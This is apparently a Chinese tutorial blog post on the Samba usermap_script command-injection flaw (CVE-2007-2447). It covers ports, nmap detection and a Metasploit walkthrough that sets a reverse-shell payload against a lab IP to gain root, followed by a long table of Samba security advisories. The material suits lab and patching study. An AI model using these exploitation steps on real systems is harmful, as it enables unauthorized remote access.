目录
1、samba服务介绍
2、漏洞相关信息
3、探测samba
4、metasploit利用
5、samba历年漏洞
1、samba服务介绍
1.1 samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。
1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。
1.3 samba监听的端口
TCP:139、445。tcp 端口相对应的服务是 smbd 服务,其作用是提供对服务器中文件、打印资源的共享访问。
UDP:137、138。udp 端口相对应的服务是 nmbd 服务,其作用是提供基于 NetBIOS 主机名称的解析。
更多参考:Samba 服务详解_公博义的博客-CSDN博客_samba
2、漏洞相关信息
2.1 关于Samba服务的usermap_script安全漏洞相关信息:
Username map script(用户名映射脚本)是Samba协议的一个漏洞(CVE-2007-2447),始披露于2007年。属于远程命令注入漏洞,主要影响Samba的3.0.20到3.0.25rc3 版本。2.2 漏洞描述:
Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
相关参考:
阿里云漏洞库文章来源地址https://www.toymoban.com/news/detail-733584.html
https://www.cnvd.org.cn/flaw/show/CNVD-2007-3296
NVD - CVE-2007-2447
2.3 解决方案:
更新到高版本
3、探测samba
使用nmap探测
nmap -sV -p 139,445 ip
4、metasploit利用
使用metasploit内集成的samba usermap RCE脚本:
exploit/multi/samba/usermap_script
use exploit/multi/samba/usermap_script
show options
set rhosts 192.168.106.132
使用payload进行攻击
show payloads
set payload cmd/unix/reverse
show options
exploit
成功获取靶机root权限,CTRL+C退出
5、samba历年漏洞
参考 :
Samba - Security Updates and Information文章来源:https://www.toymoban.com/news/detail-733584.html
阿里云漏洞库
| Samba安全发布 | |||||
|---|---|---|---|---|---|
| 发布日期 | 下载 | 已知问题 | 受影响的版本 | CVE ID # | 细节 |
| 25 October 2022 |
patch for Samba 4.17.2 patch for Samba 4.16.6 patch for Samba 4.15.11 |
CVE-2022-3437 and CVE-2022-3592. Please see announcements for details. | Please refer to the advisories. | CVE-2022-3437, CVE-2022-3592. | Announcement, Announcement. |
| 27 July 2022 |
patch for Samba 4.16.4 patch for Samba 4.15.9 patch for Samba 4.14.14 |
CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745 and CVE-2022-32746. Please see announcements for details. | Please refer to the advisories. | CVE-2022-2031, CVE-2022-32742, CVE-2022-32744, CVE-2022-32745, CVE-2022-32746. | Announcement, Announcement, Announcement, Announcement, Announcement. |
| 31 January 2022 |
patch for Samba 4.15.5 patch for Samba 4.14.12 patch for Samba 4.13.17 |
CVE-2021-44141, CVE-2021-44142 and CVE-2022-0336. Please see announcements for details. | Please refer to the advisories. | CVE-2021-44141, CVE-2021-44142, CVE-2022-0336. | Announcement, Announcement, Announcement. |
| 10 January 2022 | patch for Samba 4.13.16 | Symlink race error can allow directory creation outside of the exported share. | All versions of the Samba file server prior to 4.13.16 | CVE-2021-43566. | Announcement. |
| 9 November 2021 |
patch for Samba 4.15.1 patch for Samba 4.14.9 patch for Samba 4.13.13 |
CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738 and CVE-2021-23192. Please see announcements for details. | Please refer to the advisories. | CVE-2016-2124, CVE-2020-25717, CVE-2020-25718, CVE-2020-25719, CVE-2020-25721, CVE-2020-25722, CVE-2021-3738, CVE-2021-23192. | Announcement, Announcement, Announcement, Announcement, Announcement, Announcement, Announcement, Announcement. |
| 29 Apr 2021 |
patch for Samba 4.14.3 patch for Samba 4.13.7 patch for Samba 4.12.14 |
Negative idmap cache entries can cause incorrect group entries in the Samba file server process token. | All versions since 3.6.0. | CVE-2021-20254 | Announcement |
| 24 Mar 2021 |
patch for Samba 4.14.0 patch for Samba 4.13.5 patch for Samba 4.12.12 |
CVE-2020-27840 and CVE-2021-20277. Please see announcements for details. | Please refer to the advisories. | CVE-2020-27840, CVE-2021-20277. | Announcement, Announcement. |
| 29 Oct 2020 |
patch for Samba 4.13.0 patch for Samba 4.12.8 patch for Samba 4.11.14 |
CVE-2020-14318, CVE-2020-14323 and CVE-2020-14383. Please see announcements for details. | Please refer to the advisories. | CVE-2020-14318, CVE-2020-14323 CVE-2020-14383. | Announcement, Announcement, Announcement. |
| 18 Sep 2020 |
patch for Samba 4.12.6 patch for Samba 4.11.12 patch for Samba 4.10.17 |
CVE-2020-1472. Please see announcements for details. | Please refer to the advisory. | CVE-2020-1472. | Announcement, |
| 02 Jul 2020 |
patch for Samba 4.12.3 patch for Samba 4.11.10 patch for Samba 4.10.16 |
CVE-2020-10730, CVE-2020-10745, CVE-2020-10760 and CVE-2020-14303. Please see announcements for details. | Please refer to the advisories. | CVE-2020-10730, CVE-2020-10745, CVE-2020-10760, CVE-2020-14303. | Announcement, Announcement, Announcement, Announcement |
| 28 Apr 2020 |
patch for Samba 4.12.1 patch for Samba 4.11.7 patch for Samba 4.10.14 |
CVE-2020-10700 and CVE-2020-10704. Please see announcements for details. | Please refer to the advisories. | CVE-2020-10700, CVE-2020-10704. | Announcement, Announcement |
| 21 Jan 2020 |
patch for Samba 4.11.4 patch for Samba 4.10.11 patch for Samba 4.9.17 |
CVE-2019-14902, CVE-2019-14907 and CVE-2019-19344. Please see announcements for details. | Please refer to the advisories. | CVE-2019-14902, CVE-2019-14907, CVE-2019-19344.. | Announcement, Announcement, Announcement |
| 10 Dec 2019 |
patch for Samba 4.11.2 patch for Samba 4.10.10 patch for Samba 4.9.16 |
CVE-2019-14861 and CVE-2019-14870. Please see announcements for details. | All versions since Samba 4.0 | CVE-2019-14861, CVE-2019-14870. | Announcement, Announcement |
| 29 Oct 2019 |
patch for Samba 4.11.1 patch for Samba 4.10.9 patch for Samba 4.9.14 |
CVE-2019-10218, CVE-2019-14833 and CVE-2019-14847. Please see announcements for details. | please refer to the advisories | CVE-2019-10218, CVE-2019-14833, CVE-2019-14847 | Announcement, Announcement, Announcement |
| 03 Sep 2019 |
patch for Samba 4.10.7 patch for Samba 4.9.12 |
Combination of parameters and permissions can allow user to escape from the share path definition. | All versions between Samba 4.9.0 and 4.9.12/4.10.7 (incl.). | CVE-2019-10197 | Announcement |
| 19 Jun 2019 |
patch for Samba 4.10.4 (both CVEs) patch for Samba 4.9.8 (CVE-2019-12435 only) |
CVE-2019-12435 and CVE-2019-12436. Please see the announcements for details. | please refer to the advisories | CVE-2019-12435, CVE-2019-12436 | Announcement, Announcement |
| 14 May 2019 |
patch for Samba 4.10.2 patch for Samba 4.9.7 patch for Samba 4.8.11 |
CVE-2018-16860. Please see the announcements for details. | All versions of Samba prior to 4.10.3, 4.9.8, 4.8.12. | CVE-2018-16860 | Announcement |
| 08 Apr 2019 |
patch for Samba 4.10.1 (both CVEs) patch for Samba 4.9.5 (both CVEs) patch for Samba 4.8.10 (CVE-2019-3880 only) |
CVE-2019-3870 and CVE-2019-3880. Please see the announcements for details. | please refer to the advisories | CVE-2019-3870, CVE-2019-3880 | Announcement, Announcement |
| 27 Nov 2018 |
patch for Samba 4.9.2 (all CVEs) patch for Samba 4.8.6 (all CVEs except CVE-2018-16852 and CVE-2018-16857) patch for Samba 4.7.11 (all CVEs except CVE-2018-16852 and CVE-2018-16857) |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2018-14629, CVE-2018-16841, CVE-2018-16851, CVE-2018-16852, CVE-2018-16853, CVE-2018-16857 | Announcement, Announcement, Announcement, Announcement, Announcement, Announcement |
| 14 Aug 2018 |
patch for Samba 4.8.3 (all CVEs) patch for Samba 4.7.8 (all CVEs except CVE-2018-1140) patch for Samba 4.6.15 (CVE-2018-10858 and CVE-2018-10919) |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2018-10858, CVE-2018-10918, CVE-2018-10919, CVE-2018-1139, CVE-2018-1140 | Announcement, Announcement, Announcement, Announcement, Announcement |
| 13 Mar 2018 |
patch for Samba 4.7.5 patch for Samba 4.6.13 patch for Samba 4.5.15 patch for Samba 4.4.16 (only CVE-2018-1057) patch for Samba 4.3.13 (only CVE-2018-1057) |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2018-1050, CVE-2018-1057 | Announcement, Announcement |
| 21 Nov 2017 |
patch for Samba 4.7.2 patch for Samba 4.6.10 patch for Samba 4.5.14 |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2017-14746, CVE-2017-15275 | Announcement, Announcement |
| 20 Sep 2017 |
patch for Samba 4.6.7 patch for Samba 4.5.13 patch for Samba 4.4.15 |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2017-12150, CVE-2017-12151, CVE-2017-12163 | Announcement, Announcement, Announcement |
| 12 July 2017 | patch for Samba 4.x.y | Orpheus' Lyre mutual authentication validation bypass. | All versions between Samba 4.0.0 and 4.6.6/4.5.12/4.4.15 | CVE-2017-11103 | Announcement |
| 24 May 2017 | patch for Samba 4.6.3, 4.5.9, 4.4.13 | Remote code execution from a writable share. | All versions between Samba 3.5.0 and 4.6.4/4.5.10/4.4.14 | CVE-2017-7494 | Announcement |
| 23 Mar 2017 |
patch for Samba 4.6.0 patch for Samba 4.5.6 patch for Samba 4.4.11 |
Symlink race allows access outside share definition. | All versions of Samba prior to 4.6.1, 4.5.7, 4.4.12 | CVE-2017-2619 | Announcement |
| 19 Dec 2016 |
patch for Samba 4.5.2 patch for Samba 4.4.7 patch for Samba 4.3.12 |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2016-2123, CVE-2016-2125, CVE-2016-2126 | Announcement, Announcement, Announcement |
| 07 Jul 2016 |
patch for Samba 4.4.4 patch for Samba 4.3.10 patch for Samba 4.2.13 |
Client side SMB2/3 required signing can be downgraded. | 4.0.0 - 4.4.4 | CVE-2016-2119 | Announcement |
| 12 Apr 2016 |
patch for Samba 4.4.0 patch for Samba 4.3.6 patch for Samba 4.2.9 patch for Samba 4.0.26 (fileserver only! no client! no domain controller!) patch for Samba 3.6.25 (only related CVEs) |
Numerous CVEs. Please see the announcements for details. | please refer to the advisories | CVE-2015-5370, CVE-2016-2110, CVE-2016-2111, CVE-2016-2112, CVE-2016-2113, CVE-2016-2114, CVE-2016-2115, CVE-2016-2118 | Announcement Announcement Announcement Announcement Announcement Announcement Announcement Announcement |
| 08 Mar 2016 |
patch for Samba 4.3.5 patch for Samba 4.2.8 patch for Samba 4.1.22 |
Incorrect ACL get/set allowed on symlink path, Out-of-bounds read in internal DNS server. | please refer to the advisories | CVE-2015-7560, CVE-2016-0771, | Announcement Announcement |
| 16 Dec 2015 |
patch for Samba 4.3.2 patch for Samba 4.2.6 patch for Samba 4.1.21 patch for Samba 3.6.25 |
Numerous CVEs. Please see the announcements for details. | 3.0.0 to 4.3.2 | CVE-2015-3223, CVE-2015-5252, CVE-2015-5296, CVE-2015-5299, CVE-2015-5330, CVE-2015-7540, CVE-2015-8467 | Announcement Announcement Announcement Announcement Announcement Announcement Announcement |
| 23 Feb 2015 |
patch for Samba 4.1.16 patch for Samba 4.0.24 patch for Samba 3.6.24 patch for Samba 3.5.22 |
Unexpected code execution in smbd. | 3.5.0 - 4.2.0rc4 | CVE-2015-0240 | Announcement |
| 15 Jan 2015 |
patch for Samba 4.1.15 patch for Samba 4.0.23 |
Elevation of privilege to Active Directory Domain Controller. | 4.0.0 - 4.1.15 | CVE-2014-8143 | Announcement |
| 01 Aug 2014 |
patch for Samba 4.1.10 patch for Samba 4.0.20 |
Remote code execution in nmbd. | 4.0.0 - 4.1.10 | CVE-2014-3560 | Announcement |
| 23 Jun 2014 |
patch for Samba 4.1.8 patch for Samba 4.0.18 patch for Samba 3.6.23 |
Denial of service - CPU loop, Denial of service - Server crash/memory corruption. | please refer to the advisories | CVE-2014-0244, CVE-2014-3493 | Announcement Announcement |
| 03 June 2014 |
patch for Samba 4.0.17 patch for Samba 4.1.7 patch for Samba 3.6.23 (CVE-2014-0178 only) |
Uninitialized memory exposure, Potential DOS in Samba internal DNS server. | please refer to the advisories | CVE-2014-0178, CVE-2014-0239 | Announcement Announcement |
| 11 Mar 2014 |
patch for Samba 4.1.5 patch for Samba 4.0.15 patch for Samba 3.6.22 |
Password lockout not enforced for SAMR password changes, smbcacls can remove a file or directory ACL by mistake. | please refer to the advisories | CVE-2013-4496, CVE-2013-6442 | Announcement Announcement |
| 09 Dec 2013 |
patch for Samba 4.1.2 patch for Samba 4.0.12 patch for Samba 3.6.21 patch for Samba 3.5.22 patch for Samba 3.4.17 |
DCE-RPC fragment length field is incorrectly checked, pam_winbind login without require_membership_of restrictions. | please refer to the advisories | CVE-2013-4408, CVE-2012-6150 | Announcement Announcement |
| 11 Nov 2013 |
patch for Samba 4.1.0 patch for Samba 4.0.10 patch for Samba 3.6.19 |
ACLs are not checked on opening an alternate data stream on a file or directory, Private key in key.pem world readable. | 3.2.0 - 4.1.0, 4.0.0 - 4.0.10, 4.1.0 | CVE-2013-4475, CVE-2013-4476 | Announcement Announcement |
| 05 Aug 2013 |
patch for Samba 4.0.7 patch for Samba 3.6.16 patch for Samba 3.5.21 |
Denial of service - CPU loop and memory allocation. | 3.0.x-4.0.7 | CVE-2013-4124 | Announcement |
| 02 Apr 2013 | patch for Samba 3.6.5 | A writable configured share might get read only | 3.6.0 - 3.6.5 (inclusive) | CVE-2013-0454 | Announcement |
| 19 Mar 2013 | patch for Samba 4.0.3 | World-writeable files may be created in additional shares on a Samba 4.0 AD DC. | 4.0.0rc6-4.0.3 | CVE-2013-1863 | Announcement |
| 30 Jan 2013 |
patch for Samba 4.0.1 patch for Samba 3.6.11 patch for Samba 3.5.20 |
Clickjacking issue and potential XSRF in SWAT. | 3.0.x-4.0.1 | CVE-2013-0213, CVE-2013-0214 | Announcement Announcement |
| 15 Jan 2013 | patch for Samba 4.0.0 | Samba 4.0 as an AD DC may provide authenticated users with write access to LDAP directory objects. | 4.0.0 | CVE-2013-0172 | Announcement |
| 30 Apr 2012 |
patch for Samba 3.4.16 patch for Samba 3.5.14 patch for Samba 3.6.4 |
Incorrect permission checks when granting/removing privileges can compromise file server security. | 3.4.x-3.6.4 | CVE-2012-2111 | Announcement |
| 10 Apr 2012 |
patch for Samba 3.0.37 patch for Samba 3.2.15 patch for Samba 3.3.16 patch for Samba 3.4.15 patch for Samba 3.5.13 patch for Samba 3.6.3 |
"root" credential remote code execution | all current releases | CVE-2012-1182 | Announcement |
| 23 Feb 2012 |
patch for Samba 3.0 patch for Samba 3.2 patch for Samba 3.3 |
Remote code execution vulnerability in smbd | pre-3.4 | CVE-2012-0870 | Announcement |
| 29 Jan 2012 | patch for Samba 3.6.2 | Memory leak/Denial of service | 3.6.0-3.6.2 | CVE-2012-0817 | Announcement |
| 26 Jul 2011 |
patch for Samba 3.3.15 patch for Samba 3.4.13 patch for Samba 3.5.9 |
Cross-Site Request Forgery in SWAT | all current releases | CVE-2011-2522 | Announcement |
| 26 Jul 2011 |
patch for Samba 3.3.15 patch for Samba 3.4.13 patch for Samba 3.5.9 |
Cross-Site Scripting vulnerability in SWAT | all current releases | CVE-2011-2694 | Announcement |
| 18 Feb 2011 |
patch for Samba 3.3.14 patch for Samba 3.4.11 patch for Samba 3.5.6 |
Denial of service - memory corruption | all current releases | CVE-2011-0719 | Announcement |
| 14 Sep 2010 |
patch for Samba 3.3.13 patch for Samba 3.4.8 patch for Samba 3.5.4 |
Buffer Overrun Vulnerability | all current releases | CVE-2010-3069 | Announcement |
| 16 Jun 2010 |
patch for Samba 3.3.12 and 3.2.15 patch for Samba 3.0.37 |
Memory Corruption Vulnerability | 3.0.x, 3.2.x, 3.3.0-3.3.12 | CVE-2010-2063 | Announcement |
| 08 Mar 2010 |
patch for Samba 3.5.0 patch for Samba 3.4.6 patch for Samba 3.3.11 |
Permission ignored | 3.3.11, 3.4.6, 3.5.0 | CVE-2010-0728 | Announcement |
| 02 Feb 2010 | not available | Change parameter "wide links" to default to "no" | pre-3.4.6 | CVE-2010-0926 | Announcement |
| 01 Oct 2009 | patch 1 for Samba 3.4.1 patch 2 for Samba 3.4.1 patch 1 for Samba 3.3.7 patch 2 for Samba 3.3.7 patch 1 for Samba 3.2.14 patch 2 for Samba 3.2.14 patch 1 for Samba 3.0.36 patch 2 for Samba 3.0.36 | Information disclosure by setuid mount.cifs | all releases | CVE-2009-2948 | Announcement |
| 01 Oct 2009 |
patch for Samba 3.4.1 patch for Samba 3.3.7 patch for Samba 3.2.14 patch for Samba 3.0.36 |
Remote DoS against smbd on authenticated connections | all releases | CVE-2009-2906 | Announcement |
| 01 Oct 2009 |
patch for Samba 3.4.1 patch for Samba 3.3.7 patch for Samba 3.2.14 patch for Samba 3.0.36 |
Misconfigured /etc/passwd file may share folders unexpectedly | > 3.0.11 | CVE-2009-2813 | Announcement |
| 23 Jun 2009 |
patch for Samba 3.3.5 patch for Samba 3.2.12 patch for Samba 3.0.34 |
Uninitialized read of a data value | Samba 3.0.31 - 3.3.5 | CVE-2009-1888 | Announcement |
| 23 Jun 2009 | patch for Samba 3.2.12 | Formatstring vulnerability in smbclient | Samba 3.2.0 - 3.2.12 | CVE-2009-1886 | Announcement |
| 05 Jan 2009 | patch for Samba 3.2.6 | Potential access to "/" in setups with registry shares enabled | Samba 3.2.0 - 3.2.6 | CVE-2009-0022 | Announcement |
| 27 Nov 2008 | patch for Samba 3.0.32 patch for Samba 3.2.4 | Potential leak of arbitrary memory contents | Samba 3.0.29 - 3.2.4 | CVE-2008-4314 | Announcement |
| 27 Aug 2008 | patch 1 for Samba 3.2.2 patch 2 for Samba 3.2.2 | Wrong permissions of group_mapping.ldb | Samba 3.2.0 - 3.2.2 | CVE-2008-3789 | Announcement |
| 29 May 2008 | patch for Samba 3.0.29 | Boundary failure when parsing SMB responses | Samba 3.0.0 - 3.0.29 | CVE-2008-1105 | Announcement |
| 10 Dec 2007 | patch for Samba 3.0.27a | Remote Code Execution in Samba's nmbd (send_mailslot()) | Samba 3.0.0 - 3.0.27a | CVE-2007-6015 | Announcement |
| 15 Nov 2007 | patch for Samba 3.0.26a | Remote Code Execution in Samba's nmbd | Samba 3.0.0 - 3.0.26a | CVE-2007-5398 | Announcement |
| 15 Nov 2007 | patch for Samba 3.0.26a | GETDC mailslot processing buffer overrun in nmbd | Samba 3.0.0 - 3.0.26a | CVE-2007-4572 | Announcement |
| 11 Sep 2007 | patch for Samba 3.0.25 | Incorrect primary group assignment for users using the rfc2307 or sfu nss info plugin. | Samba 3.0.25 - 3.0.25c | CVE-2007-4138 | Announcement |
| 14 May 2007 | patch for Samba 3.0.24 | Remote Command Injection Vulnerability (Updated June 5 to include missing "c" character from INCLUDE list). | Samba 3.0.0 - 3.0.25rc3 | CVE-2007-2447 | Announcement |
| 14 May 2007 | patch for Samba 3.0.24 | Multiple Heap Overflows Allow Remote Code Execution (Updated May 25 to fix regression in Samba domain controller logon code). | Samba 3.0.0 - 3.0.25rc3 | CVE-2007-2446 | Announcement |
| 14 May 2007 | patch for Samba 3.0.24 | Local SID/Name translation bug can result in user privilege elevation (Updated May 25 to fix regression in the "force group" parameter). | Samba 3.0.23d - 3.0.25pre2 | CVE-2007-2444 | Announcement |
| 5 Feb 2007 | patch for Samba 3.0.23d | Potential Denial of Service bug in smbd | Samba 3.0.6 - 3.0.23d | CVE-2007-0452 | Announcement |
| 5 Feb 2007 | patch for Samba 3.0.23d | Buffer overrun in NSS host lookup Winbind library on Solaris | Samba 3.0.21 - 3.0.23d | CVE-2007-0453 | Announcement |
| 5 Feb 2007 | patch for Samba 3.0.23d | Format string bug in afsacl.so VFS plugin | Samba 3.0.6 - 3.0.23d | CVE-2007-0454 | Announcement |
| 10 July 2006 | patch for Samba 3.0.1 - 3.0.22 | Memory exhaustion DoS against smbd | Samba 3.0.1 - 3.0.22 | CVE-2006-3403 | Announcement |
| 30 March 2006 | patch for Samba 3.0.21[a-c] | Exposure of machine account credentials in winbind log files | Samba 3.0.21 - 3.0.21c | CVE-2006-1059 | Announcement |
| 16 December 2004 | patch for Samba 3.0.9 | Integer Overflow in security descriptor parsing | Samba 2.x, 3.0.x <= 3.0.9 | CVE-2004-1154 | Announcement |
| 15 November 2004 | patch for <=Samba 3.0.7 | Buffer Overrun in smbd | Samba 3.0.x <= 3.0.7 | CVE-2004-0882 | Announcement |
| 8 November 2004 | patch for <=Samba 3.0.7 | Remote DoS | Samba 3.0.x <= 3.0.7 | CVE-2004-0930 | Announcement |
| 30 September 2004 | Samba 2.2.12 and/or patch for <=Samba 3.0.2a | Potential arbitrary file access | Samba 2.2.x <=2.2.11 and Samba 3.0.x <=3.0.2a | CVE-2004-0815 | Announcement |
| 13 Sept 2004 | 3.0.5 patch | Two DoS bugs; one affecting smbd, the other nmbd. | 3.0.x <= 3.0.6 | CVE-2004-0807, CVE-2004-0808 | Announcement |
| 22 Jul 2004 | 3.0.5 | Two potential buffer overruns | >=3.0.2 | CVE-2004-0600, CVE-2004-0686 | CVE-2004-0600 Announcement CVE-2004-0686 Announcement |
| 22 Jul 2004 | 2.2.10 | Buffer overrun in hash mangling method | all 2.2 releases | CVE-2004-0686 | release notes |
| 9 Feb 2004 | 3.0.2a | Password initialization bug that could grant an attacker unauthorized access to a user account created by the mksmbpasswd.sh shell script. | >=3.0.0 | CVE-2004-0082 | Announcement |
| 7 Apr 2003 | 2.2.8a | Buffer overrun condition in the SMB/CIFS packet fragment re-assembly code. | all 2.0 releases and <= 2.2.8 | CVE-2003-0196, CVE-2003-0201 | release notes |
| 10 Dec 2002 | 2.2.7a | Bug in the length checking for encrypted password change requests from clients. | 2.2.2 - 2.2.6 | CVE-2003-0085 | release notes |
| 23 Jun 2001 | 2.2.0a | Bug in expansion of certain smb.conf variables such as %m that could grant an attacker the capability to overwrite arbitrary files on the server. Bug that causes smbd not to honor the hosts allow and deny smb.conf directives. | 2.2.0 | release notes | |
| 23 Jun 2001 | 2.0.10 | Bug in the handling of temporary files that allows local users to destroy data on local devices. | >= 2.0.0 | release notes | |
到了这里,关于4.9、漏洞利用 smb-RCE远程命令执行的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
